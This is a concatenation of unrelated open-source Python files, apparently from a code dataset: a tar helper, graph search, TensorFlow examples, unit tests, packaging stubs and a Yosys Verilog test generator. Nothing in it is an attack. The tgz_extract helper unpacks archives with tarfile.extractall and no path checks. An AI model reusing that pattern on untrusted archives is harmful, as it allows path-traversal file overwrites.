# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import tarfile
def tgz_compress(dir_path, file_path, compression_level=0):
target_directory = os.path.dirname(file_path)
if target_directory and not os.path.exists(target_directory):
os.makedirs(target_directory)
with tarfile.open(file_path, 'w:gz', compresslevel=compression_level) as tar:
for file_ in os.listdir(dir_path):
tar.add(dir_path + '/' + file_, file_)
def tgz_extract(file_path, dir_path):
if dir_path and not os.path.exists(dir_path):
os.makedirs(dir_path)
with tarfile.open(file_path, 'r:gz') as tar:
tar.extractall(dir_path)
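# Usage sketch (paths are placeholders):
#
#   tgz_compress('exported_model.nnef', 'exported_model.nnef.tgz')
#   tgz_extract('exported_model.nnef.tgz', 'unpacked_model.nnef')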
|
examples/blocks/get_block_reward.py
|
adamzhang1987/py-etherscan-api
| 458 |
116660
|
from etherscan.blocks import Blocks
import json
with open('../../api_key.json', mode='r') as key_file:
key = json.loads(key_file.read())['key']
api = Blocks(api_key=key)
reward = api.get_block_reward(2165403)
print(reward)
|
rsbook_code/utilities/search.py
|
patricknaughton01/RoboticSystemsBook
| 116 |
116692
|
"""
Includes Dijkstra's algorithm and two A* implementations.
"""
from __future__ import print_function,division
import heapq #for a fast priority queue implementation
def predecessor_traverse(p,s,g):
"""Used by dijkstra's algorithm to traverse a predecessor dictionary"""
L = []
v = g
while v is not None:
L.append(v)
v = p.get(v,None)
    #rather than prepending, we appended and now we'll reverse. This is more efficient than prepending
return L[::-1]
def dijkstras(G,s,g,cost=(lambda v,w:1),verbose=1):
"""Completes a shortest-path search on graph G.
Args:
G (AdjListGraph or networkx Graph/DiGraph): the graph to search
s: the start node
g: the goal node or a goal test
cost (optional): a callback function c(v,w) that returns the edge cost
verbose (optional): if nonzero, will print information about search
progress.
Returns:
tuple: a triple (path,distances,predecessors) giving
- path: a list or None: either the path of nodes from s to g with
minimum cost, or None if no path exists.
- distances: a dictionary mapping nodes to distances from start
- predecessors: a dictionary mapping nodes to parent nodes
that can be walked by ``predecessor_traverse`` to get the optimal
path to any reached node.
"""
if not callable(g):
gtest = lambda x,goal=g: x==g
else:
gtest = g
d = dict((v,float('inf')) for v in G.nodes())
p = dict((v,None) for v in G.nodes())
d[s] = 0
Q = [(0,s)] #each element is a tuple (c,v) with c=cost from start, v=vertex
nnodes = 0
while len(Q) > 0:
c,v = heapq.heappop(Q) #get the element in the queue with the least value of c
nnodes += 1
if gtest(v):
#found a path
if verbose: print("Dijkstra's succeeded in",nnodes,"iterations")
return predecessor_traverse(p,s,v),d,p
for w in G.neighbors(v):
dcand = d[v] + cost(v,w) #this is the cost of going through v to w
if dcand < d[w]:
#going through v is optimal
#if the predecessor of w is not None, then we'll have to adjust the heap
if p[w] is not None:
Q = [(c,x) for (c,x) in Q if x is not w]
heapq.heapify(Q)
d[w] = dcand
p[w] = v
#put w on the queue
heapq.heappush(Q,(dcand,w))
#no path found
if verbose: print("Dijkstra's failed in",nnodes,"iterations")
return None,d,p
def astar(G,s,g,cost=(lambda v,w:1),heuristic=(lambda v:0),verbose=1):
"""Completes an A* search on graph G.
Args:
G (AdjListGraph, networkx Graph / DiGraph): the graph to search.
s: the start node
g: the goal node or goal test
cost (optional): a callback function c(v,w) that returns the edge cost
heuristic (optional): a callback function h(v) that returns the
heuristic cost-to-go between v and g
verbose (optional): if nonzero, will print information about search
progress.
Returns:
tuple: a triple (path,distances,predecessors) giving
- path: a list or None: either the path of nodes from s to g with
minimum cost, or None if no path exists.
- distances: a dictionary mapping nodes to distances from start
- predecessors: a dictionary mapping nodes to parent nodes
that can be walked by ``predecessor_traverse`` to get the optimal
path to any reached node.
"""
if not callable(g):
gtest = lambda x,goal=g: x==g
else:
gtest = g
d = dict((v,float('inf')) for v in G.nodes())
p = dict((v,None) for v in G.nodes())
d[s] = 0
Q = [(0,0,s)] #each element is a tuple (f,-c,v) with f=c + heuristic(v), c=cost from start, v=vertex
nnodes = 0
while len(Q) > 0:
        f,minus_c,v = heapq.heappop(Q) #get the element in the queue with the least value of f
nnodes += 1
if gtest(v):
#found a path
if verbose: print("A* succeeded in",nnodes,"iterations")
return predecessor_traverse(p,s,v),d,p
for w in G.neighbors(v):
dcand = d[v] + cost(v,w) #this is the cost of going through v to w
if dcand < d[w]:
#going through v is optimal
#if the predecessor of w is not None, then we'll have to adjust the heap
if p[w] is not None:
Q = [(f,c,x) for (f,c,x) in Q if x is not w]
heapq.heapify(Q)
d[w] = dcand
p[w] = v
#put w back on the queue, with the heuristic value as its priority
heapq.heappush(Q,(dcand+heuristic(w),-dcand,w))
#no path found
if verbose: print("A* failed in",nnodes,"iterations")
return None,d,p
def astar_implicit(successors,s,g,cost=(lambda v,w:1),heuristic=(lambda v:0),verbose=1):
"""Completes an A* search on a large/infinite implicit graph.
Args:
successors: a callback function s(v) that returns a list of neighbors
of a node v.
s: the start node
g: the goal node or goal test
cost (optional): a callback function c(v,w) that returns the edge cost
heuristic (optional): a callback function h(v) that returns the
heuristic cost-to-go between v and g
verbose (optional): if nonzero, will print information about search
progress.
Returns:
tuple: a triple (path,distances,predecessors) giving
- path: a list or None: either the path of nodes from s to g with
minimum cost, or None if no path exists.
- distances: a dictionary mapping reached nodes to distances from start
- predecessors: a dictionary mapping reached nodes to parent nodes
that can be walked by ``predecessor_traverse`` to get the optimal
path to any reached node.
"""
if not callable(g):
gtest = lambda x,goal=g: x==g
else:
gtest = g
inf = float('inf')
d = dict()
p = dict()
d[s] = 0
Q = [(0,0,s)] #each element is a tuple (f,-c,v) with f=c + heuristic(v), c=cost from start, v=vertex
nnodes = 0
while len(Q) > 0:
        f,minus_c,v = heapq.heappop(Q) #get the element in the queue with the least value of f
nnodes += 1
if gtest(v):
#found a path
if verbose: print("A* succeeded in",nnodes,"iterations")
return predecessor_traverse(p,s,v),d,p
for w in successors(v):
dcand = d[v] + cost(v,w) #this is the cost of going through v to w
if dcand < d.get(w,float('inf')):
#going through v is optimal
#if the predecessor of w is not None, then we'll have to adjust the heap
if w in p:
Q = [(f,c,x) for (f,c,x) in Q if x is not w]
heapq.heapify(Q)
d[w] = dcand
p[w] = v
#put w back on the queue, with the heuristic value as its priority
heapq.heappush(Q,(dcand+heuristic(w),-dcand,w))
#no path found
if verbose: print("A* failed in",nnodes,"iterations")
return None,d,p
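if __name__ == "__main__":
    # Usage sketch using only this module: A* on an implicit 10x10 grid graph
    # from (0, 0) to (9, 9) with unit edge costs and a Manhattan-distance
    # heuristic (admissible here, so the returned path is optimal).
    def grid_successors(v):
        x, y = v
        candidates = [(x + 1, y), (x - 1, y), (x, y + 1), (x, y - 1)]
        return [(a, b) for (a, b) in candidates if 0 <= a < 10 and 0 <= b < 10]
    def manhattan(v, goal=(9, 9)):
        return abs(v[0] - goal[0]) + abs(v[1] - goal[1])
    path, dist, pred = astar_implicit(grid_successors, (0, 0), (9, 9),
                                      heuristic=manhattan, verbose=1)
    print("optimal path has", len(path) - 1, "moves")  # expect 18 on this grid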
|
1-Introduction/basic_operations.py
|
haigh1510/TensorFlow2.0-Examples
| 1,775 |
116694
|
<filename>1-Introduction/basic_operations.py
#! /usr/bin/env python
# coding=utf-8
#================================================================
# Copyright (C) 2019 * Ltd. All rights reserved.
#
# Editor : VIM
# File name : basic_operations.py
# Author : YunYang1994
# Created date: 2019-03-08 14:32:57
# Description :
#
#================================================================
"""
Basic Operations example using TensorFlow library.
"""
import tensorflow as tf
###======================================= assign value ===================================#
a = tf.ones([2,3])
print(a)
# a[0,0] = 10 => TypeError: 'tensorflow.python.framework.ops.EagerTensor' object does not support item assignment
a = tf.Variable(a)
a[0,0].assign(10)
b = a.read_value()
print(b)
###======================================= add, multiply, div. etc ===================================#
a = tf.constant(2)
b = tf.constant(3)
print("a + b :" , a.numpy() + b.numpy())
print("Addition with constants: ", a+b)
print("Addition with constants: ", tf.add(a, b))
print("a * b :" , a.numpy() * b.numpy())
print("Multiplication with constants: ", a*b)
print("Multiplication with constants: ", tf.multiply(a, b))
# ----------------
# More in details:
# Matrix Multiplication from TensorFlow official tutorial
# Create a Constant op that produces a 1x2 matrix. The op is
# added as a node to the default graph.
#
# The value returned by the constructor represents the output
# of the Constant op.
matrix1 = tf.constant([[3., 3.]])
# Create another Constant that produces a 2x1 matrix.
matrix2 = tf.constant([[2.],[2.]])
# Create a Matmul op that takes 'matrix1' and 'matrix2' as inputs.
# The returned value, 'product', represents the result of the matrix
# multiplication.
product = tf.matmul(matrix1, matrix2)
print("Multiplication with matrices:", product)
# broadcast matrix in Multiplication
print("broadcast matrix in Multiplication:", matrix1 * matrix2)
###===================================== cast operations =====================================#
a = tf.convert_to_tensor(2.)
b = tf.cast(a, tf.int32)
print(a, b)
###===================================== shape operations ===================================#
a = tf.ones([2,3])
print(a.shape[0], a.shape[1]) # 2, 3
shape = tf.shape(a) # a tensor
print(shape[0], shape[1])
|
setup.py
|
epfml/collaborative-attention
| 125 |
116723
|
<filename>setup.py<gh_stars>100-1000
import setuptools
setuptools.setup(
name="collaborative-attention",
version="0.1.0",
author="<NAME>",
author_email="<EMAIL>",
description="",
url="https://github.com/collaborative-attention",
packages=["collaborative_attention"],
package_dir={"": "src/"},
python_requires=">=3.6",
install_requires=[
"tensorly>=0.4.5",
"transformers==2.11.0",
"parameterized>=0.7.4",
"tqdm>=4.46.0",
"wandb==0.9.2",
],
)
|
python/tests/artm/test_regularizer_topic_selection.py
|
MelLain/bigartm
| 638 |
116735
|
<reponame>MelLain/bigartm
# Copyright 2017, Additive Regularization of Topic Models.
import shutil
import glob
import tempfile
import os
import pytest
from six.moves import range
import artm
def test_func():
topic_selection_tau = 0.5
num_collection_passes = 3
num_document_passes = 10
num_topics = 15
data_path = os.environ.get('BIGARTM_UNITTEST_DATA')
batches_folder = tempfile.mkdtemp()
perplexity_eps = 0.1
perplexity_value = [6676.941798754971, 2534.963709464024, 2463.1544861984794]
try:
batch_vectorizer = artm.BatchVectorizer(data_path=data_path,
data_format='bow_uci',
collection_name='kos',
target_folder=batches_folder)
dictionary = artm.Dictionary(data_path=batches_folder)
model = artm.ARTM(num_topics=num_topics, dictionary=dictionary, num_document_passes=num_document_passes)
model.regularizers.add(artm.TopicSelectionThetaRegularizer(name='TopicSelection', tau=topic_selection_tau))
model.scores.add(artm.PerplexityScore(name='PerplexityScore'))
model.scores.add(artm.TopicMassPhiScore(name='TopicMass', model_name=model.model_nwt))
model.fit_offline(batch_vectorizer=batch_vectorizer, num_collection_passes=num_collection_passes)
# Verify that only 8 topics are non-zero (due to TopicSelection regularizer)
topics_left = sum(x == 0 for x in model.get_score('TopicMass').topic_mass)
assert 8 == topics_left
        # the following assertion fails on travis-ci builds, but passes locally
for i in range(num_collection_passes):
assert abs(model.score_tracker['PerplexityScore'].value[i] - perplexity_value[i]) < perplexity_eps
finally:
shutil.rmtree(batches_folder)
|
tools/grit/grit/format/chrome_messages_json_unittest.py
|
zealoussnow/chromium
| 14,668 |
116742
|
<gh_stars>1000+
#!/usr/bin/env python3
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Unittest for chrome_messages_json.py.
"""
from __future__ import print_function
import json
import os
import sys
if __name__ == '__main__':
sys.path.append(os.path.join(os.path.dirname(__file__), '../..'))
import unittest
from six import StringIO
from grit import grd_reader
from grit import util
from grit.tool import build
class ChromeMessagesJsonFormatUnittest(unittest.TestCase):
# The default unittest diff limit is too low for our unittests.
# Allow the framework to show the full diff output all the time.
maxDiff = None
def testMessages(self):
root = util.ParseGrdForUnittest(u"""
<messages>
<message name="IDS_SIMPLE_MESSAGE">
Simple message.
</message>
<message name="IDS_QUOTES">
element\u2019s \u201c<ph name="NAME">%s<ex>name</ex></ph>\u201d attribute
</message>
<message name="IDS_PLACEHOLDERS">
<ph name="ERROR_COUNT">%1$d<ex>1</ex></ph> error, <ph name="WARNING_COUNT">%2$d<ex>1</ex></ph> warning
</message>
<message name="IDS_PLACEHOLDERS_SUBSTITUTED_BY_GETMESSAGE">
<ph name="BEGIN">$1<ex>a</ex></ph>test<ph name="END">$2<ex>b</ex></ph>
</message>
<message name="IDS_STARTS_WITH_SPACE">
''' (<ph name="COUNT">%d<ex>2</ex></ph>)
</message>
<message name="IDS_ENDS_WITH_SPACE">
(<ph name="COUNT">%d<ex>2</ex></ph>) '''
</message>
<message name="IDS_SPACE_AT_BOTH_ENDS">
''' (<ph name="COUNT">%d<ex>2</ex></ph>) '''
</message>
<message name="IDS_DOUBLE_QUOTES">
A "double quoted" message.
</message>
<message name="IDS_BACKSLASH">
\\
</message>
</messages>
""")
buf = StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'en'),
buf)
output = buf.getvalue()
test = u"""
{
"SIMPLE_MESSAGE": {
"message": "Simple message."
},
"QUOTES": {
"message": "element\u2019s \u201c%s\u201d attribute"
},
"PLACEHOLDERS": {
"message": "%1$d error, %2$d warning"
},
"PLACEHOLDERS_SUBSTITUTED_BY_GETMESSAGE": {
"message": "$1$test$2$",
"placeholders": {
"1": {
"content": "$1"
},
"2": {
"content": "$2"
}
}
},
"STARTS_WITH_SPACE": {
"message": " (%d)"
},
"ENDS_WITH_SPACE": {
"message": "(%d) "
},
"SPACE_AT_BOTH_ENDS": {
"message": " (%d) "
},
"DOUBLE_QUOTES": {
"message": "A \\"double quoted\\" message."
},
"BACKSLASH": {
"message": "\\\\"
}
}
"""
self.assertEqual(json.loads(test), json.loads(output))
def testTranslations(self):
root = util.ParseGrdForUnittest("""
<messages>
<message name="ID_HELLO">Hello!</message>
<message name="ID_HELLO_USER">Hello <ph name="USERNAME">%s<ex>
Joi</ex></ph></message>
</messages>
""")
buf = StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'fr'),
buf)
output = buf.getvalue()
test = u"""
{
"ID_HELLO": {
"message": "H\u00e9P\u00e9ll\u00f4P\u00f4!"
},
"ID_HELLO_USER": {
"message": "H\u00e9P\u00e9ll\u00f4P\u00f4 %s"
}
}
"""
self.assertEqual(json.loads(test), json.loads(output))
def testSkipMissingTranslations(self):
grd = """<?xml version="1.0" encoding="UTF-8"?>
<grit latest_public_release="2" current_release="3" source_lang_id="en"
base_dir="%s">
<outputs>
</outputs>
<release seq="3" allow_pseudo="False">
<messages fallback_to_english="true">
<message name="ID_HELLO_NO_TRANSLATION">Hello not translated</message>
</messages>
</release>
</grit>"""
root = grd_reader.Parse(StringIO(grd), dir=".")
buf = StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'fr'),
buf)
output = buf.getvalue()
test = u'{}'
self.assertEqual(test, output)
def testVerifyMinification(self):
root = util.ParseGrdForUnittest(u"""
<messages>
<message name="IDS">
<ph name="BEGIN">$1<ex>a</ex></ph>test<ph name="END">$2<ex>b</ex></ph>
</message>
</messages>
""")
buf = StringIO()
build.RcBuilder.ProcessNode(root, DummyOutput('chrome_messages_json', 'en'),
buf)
output = buf.getvalue()
test = (u'{"IDS":{"message":"$1$test$2$","placeholders":'
u'{"1":{"content":"$1"},"2":{"content":"$2"}}}}')
self.assertEqual(test, output)
class DummyOutput(object):
def __init__(self, type, language):
self.type = type
self.language = language
def GetType(self):
return self.type
def GetLanguage(self):
return self.language
def GetOutputFilename(self):
return 'hello.gif'
if __name__ == '__main__':
unittest.main()
|
csa/examples/alpha_zero.py
|
CYHSM/chess-surprise-analysis
| 197 |
116808
|
"""
Run the analysis on all alpha zero games and save the resulting plot
"""
from csa import csa
# Load Game from PGN
for game_id in range(1, 11):
path_to_pgn = './games/alphazero/alphazero-vs-stockfish_game{}.pgn'.format(game_id)
chess_game = csa.load_game_from_pgn(path_to_pgn)
# Evaluate Game
depths = range(1, 35)
cp, nodes = csa.evaluate_game(chess_game, reset_engine=True,
halfmove_numbers=None, depths=depths,
verbose=1, async_callback=True)
# Save cp
csa.save_evaluation(cp, nodes, depths, True,
True, 'alphazero_stockfish_game{}'.format(game_id))
# Plot heatmap
csa.plot_cp(cp, fn='alphazero/alphazero_stockfish_game{}.svg'.format(game_id), save=True)
|
tests/resources/mlflow-test-plugin/mlflow_test_plugin/request_header_provider.py
|
PeterSulcs/mlflow
| 10,351 |
116869
|
from mlflow.tracking.request_header.abstract_request_header_provider import RequestHeaderProvider
class PluginRequestHeaderProvider(RequestHeaderProvider):
"""RequestHeaderProvider provided through plugin system"""
def in_context(self):
return False
def request_headers(self):
return {"test": "header"}
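# Registration sketch: mlflow discovers request header providers through a
# setuptools entry point declared in the plugin's setup.py.  The group name
# below follows the mlflow plugin convention, but treat it as an assumption
# and check the mlflow plugin docs for the exact string:
#
#   entry_points={
#       "mlflow.request_header_provider": [
#           "unused=mlflow_test_plugin.request_header_provider:PluginRequestHeaderProvider",
#       ],
#   }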
|
kombu/asynchronous/aws/sqs/ext.py
|
7Geese/kombu
| 5,079 |
116885
|
# -*- coding: utf-8 -*-
"""Amazon SQS boto3 interface."""
from __future__ import absolute_import, unicode_literals
try:
import boto3
except ImportError:
boto3 = None
|
ptop/statistics/__init__.py
|
deeps-nars/ptop
| 327 |
116894
|
from .statistics import Statistics
|
deal/introspection/__init__.py
|
orsinium/condition
| 311 |
116902
|
<gh_stars>100-1000
"""
The module provides `get_contracts` function which enumerates
contracts wrapping the given function. Every contract is returned
in wrapper providing a stable interface.
Usage example:
```python
import deal
@deal.pre(lambda x: x > 0)
def f(x):
return x + 1
contracts = deal.introspection.get_contracts(f)
for contract in contracts:
assert isinstance(contract, deal.introspection.Contract)
assert isinstance(contract, deal.introspection.Pre)
assert contract.source == 'x > 0'
assert contract.exception is deal.PreContractError
contract.validate(1)
```
"""
from ._extractor import get_contracts, init_all, unwrap
from ._wrappers import (
Contract, Ensure, Example, Has, Post, Pre, Raises, Reason, ValidatedContract,
)
__all__ = [
# functions
'get_contracts',
'init_all',
'unwrap',
# wrappers
'Contract',
'Ensure',
'Example',
'Has',
'Post',
'Pre',
'Raises',
'Reason',
'ValidatedContract',
]
|
setup.py
|
yespon/Chinese-Annotator
| 915 |
116913
|
from setuptools import setup, find_packages
setup(name='chi_annotator', version='1.0', packages=find_packages())
|
third_party/tests/YosysTests/architecture/synth_xilinx_srl/generate.py
|
parzival3/Surelog
| 156 |
116915
|
<gh_stars>100-1000
#!/usr/bin/python3
import re, glob
N = 131
def assert_static_area(fp, i, name):
if i < 3:
srl32,srl16,fd = (0,0,i)
else:
srl32 = i // 32
if (i % 32) == 0:
srl16 = 0
fd = 0
elif (i % 32) == 1:
srl16 = 0
fd = 1
elif (i % 32) <= 17:
srl16 = 1
fd = (i % 32) - 16
else:
srl32 += 1
srl16 = 0
fd = 0
fp.write('''
`ifndef _AUTOTB
module __test ;
wire [4095:0] assert_area = "cd; select t:FD* -assert-count {0}; select t:SRL16E -assert-count {1}; select t:SRLC32E -assert-count {2}; cd {3}_{4}; select t:BUFG t:FD* t:SRL16E t:SRLC32E %% %n t:* %i -assert-none";
endmodule
`endif
'''.format(fd, srl16, srl32, name, i))
def assert_dynamic_area(fp, i, name):
if i < 3:
srl32,srl16,fd = (0,0,i)
lut3 = 1 if i > 1 else 0
lut5 = 0
else:
srl32 = i // 32
if (i % 128) == 0 or (i % 32) == 0:
srl16 = 0
fd = 0
elif (i % 128) == 1:
srl16 = 0
fd = 1
elif (i % 32) <= 16:
srl16 = 1
fd = 0
else:
srl32 += 1
srl16 = 0
fd = 0
lut3 = 1 if i > 128 and i < 257 else 0
lut5 = 1 if i > 256 else 0
muxf8 = (srl32+srl16) // 4
if ((srl32 + srl16) % 4) == 0:
muxf7 = muxf8 * 2
elif ((srl32 + srl16) % 4) == 3:
muxf8 += 1
muxf7 = muxf8 * 2
else:
muxf7 = (srl32+srl16) // 2
fp.write('''
`ifndef _AUTOTB
module __test ;
wire [4095:0] assert_area = "cd; select t:FD* -assert-count {0}; select t:SRL16E -assert-count {1}; select t:SRLC32E -assert-count {2}; select t:MUXF7 -assert-count {3}; select t:MUXF8 -assert-count {4}; select t:LUT3 -assert-count {5}; select t:LUT5 -assert-count {6}; cd {7}_{8}; select t:BUFG t:FD* t:SRL16E t:SRLC32E t:MUXF7 t:MUXF8 t:LUT3 t:LUT5 %% %n t:* %i -assert-none";
endmodule
`endif
'''.format(fd, srl16, srl32, muxf7, muxf8, lut3, lut5, name, i))
# Test 1: pos_clk_no_enable_no_init_not_inferred
for i in range(1,N+1):
with open('pos_clk_no_enable_no_init_not_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_no_enable_no_init_not_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, output [width-1:0] q);
generate
wire [depth:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
assign int[w][0] = i[w];
for (d = 0; d < depth; d=d+1) begin
\$_DFFE_PP_ r(.C(clk), .D(int[w][d]), .E(1'b1), .Q(int[w][d+1]));
end
assign q[w] = int[w][depth];
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'pos_clk_no_enable_no_init_not_inferred')
# Test 2: pos_clk_with_enable_no_init_not_inferred
for i in range(1,N+1):
with open('pos_clk_with_enable_no_init_not_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_with_enable_no_init_not_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, output [width-1:0] q);
generate
wire [depth:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
assign int[w][0] = i[w];
for (d = 0; d < depth; d=d+1) begin
\$_DFFE_PP_ r(.C(clk), .D(int[w][d]), .E(e), .Q(int[w][d+1]));
end
assign q[w] = int[w][depth];
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'pos_clk_with_enable_no_init_not_inferred')
# Test 3: pos_clk_with_enable_with_init_inferred
for i in range(1,N+1):
with open('pos_clk_with_enable_with_init_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_with_enable_with_init_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, output [width-1:0] q);
generate
reg [depth-1:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
for (d = 0; d < depth; d=d+1)
initial int[w][d] <= ~((d+w) % 2);
if (depth == 1) begin
always @(posedge clk) if (e) int[w] <= i[w];
assign q[w] = int[w];
end
else begin
always @(posedge clk) if (e) int[w] <= {{ int[w][depth-2:0], i[w] }};
assign q[w] = int[w][depth-1];
end
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'pos_clk_with_enable_with_init_inferred')
# Test 4: neg_clk_no_enable_no_init_not_inferred
for i in range(1,N+1):
with open('neg_clk_no_enable_no_init_not_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_no_enable_no_init_not_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, output [width-1:0] q);
generate
wire [depth:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
assign int[w][0] = i[w];
for (d = 0; d < depth; d=d+1) begin
\$_DFFE_NP_ r(.C(clk), .D(int[w][d]), .E(1'b1), .Q(int[w][d+1]));
end
assign q[w] = int[w][depth];
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'neg_clk_no_enable_no_init_not_inferred')
# Test 5: neg_clk_no_enable_no_init_inferred
for i in range(1,N+1):
with open('neg_clk_no_enable_no_init_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_no_enable_no_init_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, output [width-1:0] q);
generate
reg [depth-1:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
if (depth == 1) begin
always @(negedge clk) int[w] <= i[w];
assign q[w] = int[w];
end
else begin
always @(negedge clk) int[w] <= {{ int[w][depth-2:0], i[w] }};
assign q[w] = int[w][depth-1];
end
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'neg_clk_no_enable_no_init_inferred')
# Test 6: neg_clk_with_enable_with_init_inferred
for i in range(1,N+1):
with open('neg_clk_with_enable_with_init_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_with_enable_with_init_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, output [width-1:0] q);
generate
reg [depth-1:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
for (d = 0; d < depth; d=d+1)
initial int[w][d] <= ~((d+w) % 2);
if (depth == 1) begin
always @(negedge clk) if (e) int[w] <= i[w];
assign q[w] = int[w];
end
else begin
always @(negedge clk) if (e) int[w] <= {{ int[w][depth-2:0], i[w] }};
assign q[w] = int[w][depth-1];
end
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'neg_clk_with_enable_with_init_inferred')
# Test 10: pos_clk_no_enable_no_init_not_inferred_var_len
for i in range(1,N+1):
with open('pos_clk_no_enable_no_init_not_inferred_var_len_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_no_enable_no_init_not_inferred_var_len_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input [31:0] l, output [width-1:0] q);
generate
wire [depth:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
assign int[w][0] = i[w];
for (d = 0; d < depth; d=d+1) begin
\$_DFFE_PP_ r(.C(clk), .D(int[w][d]), .E(1'b1), .Q(int[w][d+1]));
end
wire [depth-1:0] t;
assign t = int[w][depth:1];
assign q[w] = t[l];
end
endgenerate
endmodule
'''.format(i))
assert_dynamic_area(fp, i, 'pos_clk_no_enable_no_init_not_inferred_var_len')
# Test 11: neg_clk_with_enable_with_init_inferred_var_len
for i in range(1,N+1):
with open('neg_clk_with_enable_with_init_inferred_var_len_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_with_enable_with_init_inferred_var_len_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, input [31:0] l, output [width-1:0] q);
generate
reg [depth-1:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
for (d = 0; d < depth; d=d+1)
initial int[w][d] <= ~((d+w) % 2);
if (depth == 1) begin
always @(negedge clk) if (e) int[w] <= i[w];
assign q[w] = int[w];
end
else begin
always @(negedge clk) if (e) int[w] <= {{ int[w][depth-2:0], i[w] }};
assign q[w] = int[w][l];
end
end
endgenerate
endmodule
'''.format(i))
assert_dynamic_area(fp, i, 'neg_clk_with_enable_with_init_inferred_var_len')
import lfsr_area
re_lfsr = re.compile(r'lfsr_(\d+)\.v')
for fn in glob.glob('lfsr_*.v'):
m = re_lfsr.match(fn)
if not m: continue
W = int(m.group(1))
with open(fn, 'a') as f:
print('''
`ifndef _AUTOTB
module __test ;
wire [4095:0] assert_area = "%s";
endmodule
`endif
''' % lfsr_area.area[W], file=f)
# Test 15: pos_clk_no_enable_no_init_not_inferred
for i in range(128+1,128+N+1):
with open('pos_clk_no_enable_no_init_not_inferred_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_no_enable_no_init_not_inferred_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, output [width-1:0] q);
generate
wire [depth:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
assign int[w][0] = i[w];
for (d = 0; d < depth; d=d+1) begin
\$_DFFE_PP_ r(.C(clk), .D(int[w][d]), .E(1'b1), .Q(int[w][d+1]));
end
assign q[w] = int[w][depth];
end
endgenerate
endmodule
'''.format(i))
assert_static_area(fp, i, 'pos_clk_no_enable_no_init_not_inferred')
# Test 16: neg_clk_with_enable_with_init_inferred_var_len
for i in range(128+1,128+N+1):
with open('neg_clk_with_enable_with_init_inferred_var_len_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_with_enable_with_init_inferred_var_len_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, input [31:0] l, output [width-1:0] q);
generate
reg [depth-1:0] int [width-1:0];
genvar w, d;
for (w = 0; w < width; w=w+1) begin
for (d = 0; d < depth; d=d+1)
initial int[w][d] <= ~((d+w) % 2);
if (depth == 1) begin
always @(negedge clk) if (e) int[w] <= i[w];
assign q[w] = int[w];
end
else begin
always @(negedge clk) if (e) int[w] <= {{ int[w][depth-2:0], i[w] }};
assign q[w] = int[w][l];
end
end
endgenerate
endmodule
'''.format(i))
assert_dynamic_area(fp, i, 'neg_clk_with_enable_with_init_inferred_var_len')
# Test 18: neg_clk_with_enable_with_init_inferred2
for i in range(1,N+1):
with open('neg_clk_with_enable_with_init_inferred2_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module neg_clk_with_enable_with_init_inferred2_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, output [width-1:0] q);
generate
reg [width-1:0] int [depth-1:0];
genvar w, d;
for (d = 0; d < depth; d=d+1) begin
for (w = 0; w < width; w=w+1) begin
//initial int[d][w] <= ~((d+w) % 2);
if (d == 0) begin
always @(negedge clk) if (e) int[d][w] <= i[w];
end
else begin
always @(negedge clk) if (e) int[d][w] <= int[d-1][w];
end
end
end
assign q = int[depth-1];
endgenerate
endmodule'''.format(i))
assert_static_area(fp, i, 'neg_clk_with_enable_with_init_inferred2')
# Test 19: pos_clk_with_enable_no_init_inferred2_var_len
for i in range(1,N+1):
with open('pos_clk_with_enable_no_init_inferred2_var_len_%d.v' % i, 'w') as fp:
fp.write('''
(* top *)
module pos_clk_with_enable_no_init_inferred2_var_len_{0} #(parameter width=1, depth={0}) (input clk, input [width-1:0] i, input e, input [31:0] l, output [width-1:0] q);
generate
reg [width-1:0] int [depth-1:0];
